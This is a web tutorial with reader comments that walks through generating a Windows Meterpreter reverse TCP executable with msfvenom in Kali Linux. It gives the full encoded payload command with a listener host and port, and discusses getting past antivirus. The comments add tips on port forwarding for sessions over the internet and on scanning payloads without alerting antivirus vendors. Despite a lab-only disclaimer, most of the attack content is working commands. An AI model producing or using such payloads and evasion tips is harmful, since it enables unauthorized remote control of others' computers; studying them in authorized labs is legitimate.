MSFVenom: How to create reverse tcp payload in Kali Linux

The power of MSFVenom!

The MSFVenom environment is providing a lot of options in just a single terminal window. In this tutorial we are going to take a look on how to create a reverse tcp payload in the Kali Linux operating system.

For this tutorial you will need a couple of things prepared:

The VirtualBox software is needed so you will be able to run a virtual environment on your current machine. We are not going to make this payload public because that would be illegal, instead we are going to test this payload on our own virtual environment.

The Kali Linux ISO is needed so you will be able to run the MSFVenom code which is automatically installed on the Kali Linux operating system. You can install the Kali Linux environment on the Virtualbox machine or you could use a physical machine to run Kali Linux on.

The Internet connection is needed so you can download the latest updates and upgrades which are available for the Kali Linux and MSFVenom environments. The updates will allow you to use the latest public payloads and techniques.

You will also need an windows target operating system installed. We are going to target the local windows environment because that is the only way to perform a legal payload test with the MSFVenom application.

If you use MSFVenom to gain access on computers without authorization then you will be performing an illegal act which is punishable in ALL countries.

MSFVenom

Now I believe that you have a solid local environment setup to test your pentesting skills on. The first step which we will do is BOOT UP the Kali Linux environment and login so we will have the Kali Linux desktop available.

If you are using the live version of the Kali Linux operating system your username and password will be:

username: root

password: toor

Now go ahead and open the terminal which is available in the Kali Linux operating system.

Enter the following commands in the terminal:

  1. sudo apt-get update
  2. sudo apt-get upgrade
  3. sudo service postgresql start
  4. sudo service metasploit start

The first two commands will check for the latest updates and the last two commands are needed for the MSFVenom environment. The postgresql service will allow the Metasploit database to be build and the Metasploit service will provide the various options that are available in the MSFVenom application.

Creating the Payload

Go ahead and open a new terminal in your Kali Linux environment. In the new terminal you will have to enter this command:

ifconfig

The ifconfig command will show you your local IP address which is used by the Kali Linux operating system. We will need this IP in the future, so make sure that you note down your IP.

The IP which is used in this tutorial is

192.168.23.103 – Kali Linux machine

Now that we know the local IP we can continue to the MSFVenom application. In the same terminal window you will need to enter the following command:

msfvenom -h

The msfvenom -h command will start the msfvenom application and it will load the available options which can be used in the msfvenom application.

The payload

To create the reverse tcp msfvenom payload we will need to provide the following commands in the same terminal:

msfvenom -p windows/meterpreter/reverse_tcp -o

The command above will show the options which are needed by the meterpreter reverse tcp payload.

The msfvenom reverse tcp payload requires the following options:

LHOST=192.168.23.103

LPORT=443

So the command which will create the MSFVenom reverse tcp payload is:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.23.103 LPORT=443 -f exe > Cyberwarzone_reverse_tcp.exe

Now that we have crafted the payload, we will need to make sure that the payload is not detected by antivirus scanners. The -e x86/shikata_ga_nai -i 5 -b ‘\x00’ command makes sure that the payload is encoded, but that is not enough. The antivirus companies are aware of this method and they have found ways to identify payloads which have been encoded by the MSFVenom encoding methods.

Launching the payload

Now you have to make sure that you get the payload on the target machine. There are various ways to do this, and I will leave it at that.

We have only created the payload, we also need to create the listener which allows us to exploit the targeted device which is using the reverse_tcp payload.

" data-link="https://twitter.com/intent/tweet?text=MSFVenom%3A+How+to+create+reverse+tcp+payload+in+Kali+Linux&url=https%3A%2F%2Fcyberwarzone.com%2Fmsfvenom-create-reverse-tcp-payload-kali-linux%2F&via=">">Tweet
1 Shares

6 Comments on MSFVenom: How to create reverse tcp payload in Kali Linux

  1. hi! i really need help… i tried this and it doesnt work i typed msfvenom -p windows/meterpreter/reverse_tcp -o then i get Error: Missing required argument for option please help!

  2. Hey there I have an issue regarding an android payload, when I open the apk file on the phone , and have msfconsole open and ready, after opening the apk there is no communication/sessions? I tried port triggering the lports i used but nothing… What do you think is going on?
    Thank you

  3. it depends on where that attack is going to take place,if it is over the wan then you should port forward in order to get a session started. if it is over lan then try again because might have done something wrong

  4. also I forgot to explain to you that you also need to use your public ip in order to use the hack over wan(internet),lan only requires the local ip

  5. YES dont do that if you want there is this site called nodistribute which is the same but it doesnt share the results with the anti viruses

Leave a Reply